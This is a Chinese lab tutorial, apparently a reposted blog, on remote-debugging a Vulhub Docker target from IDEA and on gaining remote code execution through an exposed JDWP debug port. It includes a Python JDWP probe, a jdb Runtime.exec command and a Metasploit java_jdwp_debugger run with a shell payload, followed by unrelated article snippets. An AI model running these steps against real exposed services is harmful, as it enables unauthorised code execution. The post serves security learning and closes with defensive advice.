IDEA远程调试与JDWP调试端口RCE漏洞

文章目录

  • 前言
  • Docker远程调试
    • Java调试原理
    • 远程调试实践
  • JDWP端口RCE
    • 调试端口探测
    • 调试端口利用
  • 总结

前言

在对一些 Java CVE 漏洞的调试分析过程中,少不了需要搭建漏洞环境的场景,但是本地 IDEA 搭建的话既麻烦(通过 pom.xml 导入各种漏洞组件和依赖包)又不安全(容易把自己机器变成靶机了),这个时候如果能直接在虚拟机运行 Vulhub 提供的 Docker 靶场并使用物理机 IDEA 对其进行远程调试,那么这项工作就显得安全便捷了。

本文来学习下如何通过 IDEA 远程调试远程 Docker 服务的靶场环境,同时学习此类调试环境衍生的服务器安全风险——JDWP调试接口对外开放导致RCE漏洞。

Docker远程调试

Java调试原理

学习如何远程调试 Docker 容器服务之前,先来了解下 Java 调试的基本原理。本章节主要参考:使用 IDEA 快速远程调试 Docker 中运行的 Java 应用程序 (强烈推荐)。

随便起个本地 Java 项目,进行 IDEA 本地调试,可以看到如下日志:
在这里插入图片描述
Debug 大致过程如下:
在这里插入图片描述
以上过程被称为 JPDA 调用体系。JPDA(Java Platform Debugger Architecture)是 sun 公司开发的 java平台调试体系, 它主要有三个层次组成:

JPDA 组成部分核心作用
Java 虚拟机工具接口 (JVMTI)它是虚拟机的本地接口,其相当于 Thread 的 sleep、yield native 方法
Java 调试网络协议 JDWP(Java Debug Wire Protocol)描述了调试信息的格式,以及在被调试的进程(server)和调试器(client)之间传输的请求
Java 调试接口(JDI)虚拟机的高级接口,调试器(client)自己实现 JDI 接口,比如 idea 等其他编译器

综上我们知道了 IDEA 调试的原理大致如下:

  1. 先建立起了 socket 连接;
  2. 将断点位置创建了断点事件通过 JDI 接口传给了 服务端(程序端)的 JVM,JVM 调用 suspend 将 JVM 挂起;
  3. JVM 挂起之后将客户端需要获取的 JVM 信息返回给客户端,返回之后 JVM resume 恢复其运行状态;
  4. 客户端获取到 JVM 返回的信息之后可以通过不同的方式展示给客户端;

总的来说,本地调试其实也可以认为是远程调试,IDEA 通过本地随机端口与 JVM 进行 socket 通信。

远程调试指的是使用本地客户端来调试运行在远程服务器上的程序。IntelliJ IDEA 远程调试的原理是,当服务器端以调试模式运行 Java 程序时,如果客户端使用文本相同的字节码和事先约定好的端口号,就可以远程调试该 Java 程序。因此,IntelliJ IDEA 远程调试的必要条件是:

  1. Java 程序必须在服务端已经启动且在调试时正在运行;
  2. Java 程序在服务端以调试模式启动,以调试模式启动需要在运行该 Java 程序时,使用一些调试模式的 JVM 参数;
  3. 客户端使用 IntelliJ IDEA 进行调试时,使用与服务端事先约定好的相同端口号,且该端口号在服务端没有被占用;
  4. 客户端使用 IntelliJ IDEA 进行调试时,使用的代码在文本上与服务端一致。

“在文本上一致” 指的是:客户端使用的代码与服务端使用的代码的文字完全相同,如果不一致,使用的断点将不起作用。文本上一致不包括注释,但包括换行。文本上一致不需要是同一个代码源文件,只需要文本相同即可。

So 问题来了:此处由于我们希望在远程调试过程中直接引用的别人的 Docker 镜像,但咱们手上又没有构建 docker 镜像时的源代码,咱们最多只能提取 docker 容器中的 jar 包,这个能不能替代服务端源代码?答案是可以的。

回想我们平时 IDEA 引入第三方 jar 包,只要 Add as Library 操作,jar 包就被打开了,可以看到 “源代码”,并且 jar 包内的 ClassName 就可以被我们实例化调用,还可以在 jar 包的 .class 文件里打断点进行调试。所以在远程调试 Docker 镜像服务的时候,我们也可以提取 docker 容器中的 jar 包,然后到 IDEA 项目中将其 Add as Library 引入即可解决代码文本与服务端保持一致的问题。

远程调试实践

此处以 Java代码审计之SpEL表达式注入漏洞分析 一文中提到的 CVE-2022-22963 靶场环境为例,在 Ubuntu 虚拟机中借助 Vulhub 靶场集成环境快速搭建 Docker 漏洞环境服务。

【注意】请先确认物理机项目的 Java 版本与远程 Docker 服务的 Java 版本一致(大版本即可,比如 Java 1.8,至于 1.8.0_202 这类的小版本则关系不大),避免断点调试失败。

1、在 docker-compose.yml 配置映射端口让 jvm debug 端口能外部访问:
在这里插入图片描述

2、在 docker-compose.yml 中使用 command 字段添加自定义启动命令:

java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=xxxx -jar jar包名称.jar
//最终示例配置如下
command: java -jar -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=9001 /spring-cloud-function-sample-0.0.1-SNAPSHOT.jar

是不是突然发现自己不知道 jar 包名字叫啥?可以先启动容器,然后执行 docker ps --no-trunc 输出完整的容器描述,就可以看到容器名称以及容器中的路径:
在这里插入图片描述
故最后添加配置如下:
在这里插入图片描述

3、执行命令:docker cp 容器id:jar包路径 目标路径,从 Docker 容器中获取等待调试的漏洞环境 Jar 包到 Ubuntu 虚拟机桌面:
在这里插入图片描述
4、Ubuntu 虚拟机搭建 python 简易 Service,通过局域网服务将文件 jar 传递到物理机中:
在这里插入图片描述
在这里插入图片描述
5、然后,划重点!!修改了 docker-compose.yml 之后,一定要执行 docker rm -f 容器ID删除容器,并重新执行docker-compose up -d生成新的容器,才会使配置生效(本人亲身踩坑的教训……):
在这里插入图片描述
在这里插入图片描述
6、接着在物理机 IDEA 随意新建一个 Java 项目中将 spring-cloud-function-sample-0.0.1-SNAPSHOT.jar 添加到文件夹中,然后右键 jar 包,选择 Add as Lirary 将其添加到项目依赖库中:
在这里插入图片描述

【强烈推荐】实际上最简洁方便的方案是:直接新建一个空文件夹存放此 Jar 文件后,解压缩 jar 包,然后通过 IDEA 直接打开该文件夹就可以。

7、先在 uppercase() 函数打上断点:
在这里插入图片描述

8、然后在 IDEA 配置 Remote Debug:
在这里插入图片描述
9、然后 Debug 运行,发现可以成功连接上远程 9001 调试端口,如下日志信息即代表成功连接:
在这里插入图片描述
但是访问 http://192.168.51.177:8080/uppercase,却发现并无法成功拦截、调试远程程序:
在这里插入图片描述

10、参考 使用 IDEA 快速远程调试 Docker 中运行的 Java 应用程序 来看,需要通过 Project Structure-->Modules-->Dependencies 手动添加要调试的 class 文件的目录 BOOT-INF 到依赖之中:
在这里插入图片描述
在这里插入图片描述

11、重新 Restart Debug,并发送报文,发现就能成功在断点处拦截远程 Docker 服务执行了:

POST /uppercase HTTP/1.1
Host: 192.168.51.177:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 3

aaa

在这里插入图片描述
12、但是还是有问题,针对该漏洞,我们需要核心下断点的类位于 lib 文件夹下的 spring-cloud-function-web-3.3.3.jar 中,而此时的断点调试仍然无法进入第三方依赖包中,故我们尝试把 lib 文件夹复制到根目录(如果你使用我在 步骤6 中推荐的方式创建文件夹打开项目,则不需要这么麻烦地复制到根目录),并右键 Add as Library
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
不幸的是,至此发现仍然无法正常在 Spring-cloud-function-web-3.2.2.jar 依赖包 Controller 层 FunctionController.class 的 post 函数处下断点拦截、调试,原因不详(此处折腾了我一上午时间,如有大佬知情的话,辛苦留言指点下,谢谢)……
在这里插入图片描述
但是经 m0rta1 大佬指点,此时也并非 lib 目录下的所有依赖包都无法添加断点,此处可以采用“曲线救国”法,在 post 函数里的 processRequest 函数添加断点,则可以成功拦截程序:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

最后简单总结下上述远程调试 Docker 服务的步骤:

  1. docker-compose.yml 配置映射端口让 jvm debug 端口能外部访问;
  2. docker-compose.yml 中使用 command 字段添加自定义启动命令:java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=xxxx -jar jar包名称.jar
  3. 容器启动后,从容器中把运行的 jar 包复制出来,新建一个文件夹将 jar 包解压缩到里面,IDEA 点击 Open 打开这个文件夹, 选择 Add as Lirary 将 lib 依赖库统一添加到项目依赖库中,并按需在代码上打上断点;
  4. IDEA 配置 Remote Debug,点击 Debug 运行即可。

【致谢】此处万分感谢 m0rta1 大佬耐心地帮我解决上述调试过程中出现的疑惑,大佬博文质量很高,强烈推荐收藏关注!

JDWP端口RCE

前面说到了,JDWP 是 JVM 虚拟机支持的一种网络通讯协议,通过该协议,Debugger 端和被调试 JVM 之间可以进行通信,调试端可以获取被调试 JVM 的包括类、对象、线程等信息。

既然 JDWP 是为 Java 调试而设计的通讯交互协议,在渗透测试的过程中,如果遇到目标服务器不小心开启了对外暴露的 JDWP 服务,那么就可以利用 JDWP 实现连接远程服务器,实现远程代码执行。

调试端口探测

此处以跟上文运行 Docker 调试服务的 Ubuntu 虚拟机处于同一局域网的 KaliLinux 作为攻击机,来完成 JDWP 危险端口的探测和漏洞利用。

此处 Ubuntu 虚拟机继续开放了 8080 服务端口和 9001 调试端口:
在这里插入图片描述
JDWP 服务探测的原理都是一样的,即向目标端口连接后发送 JDWP-Handshake,如果目标服务直接返回一样的内容则说明是 JDWP 服务。

使用Nmap扫描

Nmap 扫描会识别到 JDWP 服务,且添加 -sV 参数则可以识别对应的 JDK 版本信息,如下所示:
在这里插入图片描述
使用 Telnet 命令探测

使用 Telnet 命令探测,需要马上输入 JDWP-Handshake,然后服务端返回一样的内容,证明是 JDWP 服务(有点费手,不推荐):

──(kali㉿kali)-[~/Desktop]
└─$ telnet 192.168.51.177 9001
Trying 192.168.51.177...
Connected to 192.168.51.177.
Escape character is '^]'.
JDWP-Handshake
JDWP-Handshake
……

Python脚本探测

使用如下脚本扫描也可以,直接连接目标服务器,并向目标发送 JDWP-Handshake,如果能接收到相同内容则说明目标是开启了 JDWP 服务:

import socket

host = "192.168.51.177"
port = 9001
try:
    client = socket.socket()
    client.connect((host, port))
    client.send(b"JDWP-Handshake")
    if client.recv(1024) == b"JDWP-Handshake":
        print("[*] {}:{} Listening JDWP Service! ".format(host, port))
except Exception as e:
    print("[-] Connection failed! ")
finally:
    client.close()

在这里插入图片描述

调试端口利用

介绍来介绍两种方法,快速将探测到的 JDWP 服务端口转换成一个远程 RCE。

利用JDB工具

jdb 是 JDK 中自带的命令行调试工具,执行如下命令连接远程 JDWP 服务:

jdb -connect com.sun.jdi.SocketAttach:hostname=192.168.51.177,port=9001

在这里插入图片描述
接下来执行threads命令查看所有线程:
在这里插入图片描述
接着需要借助 thread <线程id> 命令选中一个 sleeping(正在休眠) 的线程,接下来执行stepi命令进入该线程(可通过执行help指令得知,stepi命令用于执行当前指令,启动休眠的线程)。但是我这里显然没有正在休眠的线程,导致没法继续正常往下演示,只能选取别人的截图了……
在这里插入图片描述
接下来可以通过 print|dump|eval 命令,执行 Java 表达式从而达成命令执行:

eval java.lang.Runtime.getRuntime().exec("whoami")

在这里插入图片描述
可以看到命令是执行成功,返回了一个 Process 对象。当然还可以进一步进行反弹 shell 的操作(Payload 注意先经过编码转换)。

更多 JDB 的用法请参见:Java调试工具 jdb:深入解析应用程序调试工具jdb 。

利用MSF的漏洞利用模块

为了方便,可以直接使用 Metasploit 自带的漏洞利用模块 exploit/multi/misc/java_jdwp_debugger 进行漏洞利用:

msfconsole
msf6 > use exploit/multi/misc/java_jdwp_debugger
msf6 exploit(multi/misc/java_jdwp_debugger) > set rhosts 192.168.51.177
msf6 exploit(multi/misc/java_jdwp_debugger) > set rport 9001
msf6 exploit(multi/misc/java_jdwp_debugger) > set payload linux/x64/shell/bind_tcp 
msf6 exploit(multi/misc/java_jdwp_debugger) > run

遗憾的是,我执行 MSF 攻击 Docker 靶机也出现了反弹 shell 创建 session 异常,提示跟上面 JDB 调试利用的异常一样:“MSF 找不到适合单步执行的线程”。

应该是自身靶场环境的问题,肝了一天了,此处暂时不花时间纠结了(后续再来溯源这个问题),先看下大佬的演示图吧:
在这里插入图片描述

Github利用脚本

最后,Github 也有现成的 JDWP 端口远程漏洞利用脚本:jdwp-codeifier,这里不展开,有需要自行获取测试,使用方法已有 README 文档。

总结

本文学习了如何在物理机 IDEA 中远程调试 Ununtu 虚拟机 Vubhub 靶场集成环境搭建起来的 Docker 服务,为后续漏洞分析调试提供了一种新的手段。

同时学习 Java 调试的基本步骤原理,分析了 JDWP 调试端口如果在使用完不及时关闭且暴露在外网的话可能存在的 RCE 风险。故无论是开发人员还是安全测试、运维人员,在对 Java 服务端进行远程调试后,务必终断 JDWP 调试端口。

本文参考文章:

  1. JDWP调试接口RCE漏洞介绍;
  2. 使用 IDEA 快速远程调试 Docker 中运行的 Java 应用程序 (附解决思考过程);

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/234408.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

[ 蓝桥杯Web真题 ]-布局切换

目录 介绍 准备 目标 规定 思路 解法参考 介绍 经常用手机购物的同学或许见过这种功能&#xff0c;在浏览商品列表的时候&#xff0c;我们通过点击一个小小的按钮图标&#xff0c;就能快速将数据列表在大图&#xff08;通常是两列&#xff09;和列表两种布局间来回切换。…

任何错误都不是单一的原因造成的,你的电脑没有正确启动的错误也不例外

当你的电脑无法启动到Windows时&#xff0c;你可能会看到“你的电脑没有正确启动”的错误。此错误表示启动过程中断&#xff0c;可能需要你注意&#xff0c;也可能不需要你注意。有时你可以通过重新启动计算机来解决这个问题&#xff0c;但如果不起作用&#xff0c;还有其他几种…

STM32——继电器

继电器工作原理 单片机供电 VCC GND 接单片机&#xff0c; VCC 需要接 3.3V &#xff0c; 5V 不行&#xff01; 最大负载电路交流 250V/10A &#xff0c;直流 30V/10A 引脚 IN 接收到 低电平 时&#xff0c;开关闭合。

Spring Boot 3.0 : 集成flyway数据库版本控制工具

目录 Spring Boot 3.0 : 集成flyway数据库版本控制工具flyway是什么为什么使用flyway主要特性支持的数据库&#xff1a; flyway如何使用spring boot 集成实现引入依赖配置sql版本控制约定3种版本类型 运行SpringFlyway 8.2.1及以后版本不再支持MySQL&#xff1f; 个人主页: 【⭐…

【算法Hot100系列】两数之和

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…

《深入理解计算机系统》学习笔记 - 第四课 - 浮点数

Floating Point 浮点数 文章目录 Floating Point 浮点数分数二进制示例能代表的数浮点数的表示方式浮点数编码规格化值规格化值编码示例 非规格化的值特殊值 示例IEEE 编码的一些特殊属性四舍五入&#xff0c;相加&#xff0c;相乘四舍五入四舍五入的模式二进制数的四舍五入 浮…

Terminator的layout设置(一个新的一键启动思路)

首先你得有terminator&#xff1a; sudo apt install terminator然后就能使用了&#xff0c;我一般喜欢修改它原本的水平和垂直分割&#xff1a;用ctrlshifta和ctrlshifts 把屏幕先分成多块&#xff1a; 比如是这样的&#xff0c;接下来 右键->点击Preference 弹框中上方标…

C++:this指针

目录 前言 成员函数返回this指向的对象本身时&#xff0c;为什是返回引用类型&#xff1f; 成员函数返回this对象本身时&#xff0c;内部通常会通过拷贝构造函数来创建一个临时对象&#xff1f; 总结 前言 c通过提供特殊的对象指针&#xff0c;this指针 指向被调用的成员函…

Ubuntu下安装SDL

源码下载地址&#xff08;SDL version 2.0.14&#xff09;&#xff1a;https://www.libsdl.org/release/SDL2-2.0.14.tar.gz 将源码包拷贝到系统里 使用命令解压 tar -zxvf SDL2-2.0.14.tar.gz 解压得到文件夹 SDL2-2.0.14 进入文件夹 执行命令 ./configure 执行命令 make…

Linux环境下socket本地通信

最近项目有用到了socket本地通信&#xff0c;故复习一下。之前都是基于本地虚拟机的ip地址通信的&#xff0c;现在项目&#xff0c;Linux单板上面有2个进程需要通信&#xff0c;故用到了本地socket通信&#xff0c;主要其实就是用了sockfd,文件描述符&#xff0c;也叫句柄。 服…

Android系统中使用Cunit测试C/C++接口

Android系统中使用Cunit测试C/C接口 Cunit是C/C语言的单元测试框架&#xff0c;但常用于Windows和Linux开发中。 Android系统中经常有jni、so库、hal service等都是C/C实现&#xff0c;本文讲解如何将Cunit嵌入Android中&#xff0c;用于测试一些C/C api。 Cunit简介 Cunit是很…

什么是CDN?用了CDN一定会更快吗?

文章目录 前言CDN是什么?CDN的工作原理为什么要加个CNAME那么麻烦&#xff1f;怎么知道哪个服务器IP里调用方最近&#xff1f; 回源是什么回源是什么&#xff1f;那还有哪些情况会发生回源呢&#xff1f; 怎么判断是否发生回源用了CDN一定比不用的更快吗&#xff1f;什么情况下…

C语言笔试例题_指针专练30题(附答案解析)

C语言笔试例题_指针专练30题(附答案解析) 指针一直是C语言的灵魂所在&#xff0c;是掌握C语言的必经之路&#xff0c;收集30道C语言指针题目分享给大家&#xff0c;测试环境位64位ubuntu18.04环境&#xff0c;如有错误&#xff0c;恳请指出&#xff0c;文明讨论&#xff01;&am…

【git】关于git二三事

文章目录 前言一、创建版本库1.通过命令 git init 把这个目录变成git可以管理的仓库2.将修改的内容添加到版本库2.1 git add .2.2 git commit -m "Xxxx"2.3 git status 2.4 git diff readme.txt3.版本回退3.1 git log3.2 git reset --hard HEAD^ 二、理解工作区与暂存…

面试 Redis 八股文十问十答第一期

面试 Redis 八股文十问十答第一期 作者&#xff1a;程序员小白条&#xff0c;个人博客 相信看了本文后&#xff0c;对你的面试是有一定帮助的&#xff01; ⭐点赞⭐收藏⭐不迷路&#xff01;⭐ 1.Redis数据类型有哪些? String&#xff08;字符串&#xff09;&#xff1a;是…

win11 CUDA(12.3) + cuDNN(12.x) 卸载

win11 CUDA&#xff08;12.3&#xff09; cuDNN&#xff08;12.x&#xff09;卸载 信息介绍卸载 信息介绍 本文是对应 win11RTX4070Ti 安装 CUDA cuDNN&#xff08;图文教程&#xff09; 的卸载 卸载 控制面板 --> 程序 --> 卸载程序 卸载掉图中红框内的&#xff0c…

四. 基于环视Camera的BEV感知算法-环视背景介绍

目录 前言0. 简述1. 环视背景介绍2. 环视思路3. 主流基于环视Camera的算法详解总结下载链接参考 前言 自动驾驶之心推出的《国内首个BVE感知全栈系列学习教程》&#xff0c;链接。记录下个人学习笔记&#xff0c;仅供自己参考 本次课程我们来学习下课程第四章——基于环视Camer…

【杂项】程序的执行目录和程序的当前目录

当32位应用程序运行时&#xff0c;系统将为它分配一个4GB的地址空间&#xff0c;加载模块会会分析该应用程序的输入信息&#xff0c;从中找到程序将要访问的动态链接库信息&#xff0c;在用户机器上搜索这些动态链接库&#xff0c;进而加载它们&#xff0c;搜索的顺序依次是 程…

基于C++11标准的Vector容器与多维数组编程规范学习

一、基本概念 泛型编程&#xff1a;所谓泛型程序设计&#xff0c;就是编写不依赖于具体数据类型的程序。C中&#xff0c;模板是泛型编程的主要工具。泛型程序设计的主要思想是将算法从特定的数据结构中抽象出来&#xff0c;使算法成为通用的、可以作用于各种不同的数据结构。以…

Vue3 使用图片涂鸦插件

一、安装插件 npm i toast-ui/vue-image-editor npm i tui-code-snippet npm i tui-image-editor Image-editor | TOAST UI :: Make Your Web Delicious! 官网介绍说是“凭借简单和美观的完美结合&#xff0c;图像编辑器是一个功能齐全的编辑器&#xff0c;非常适合日常使…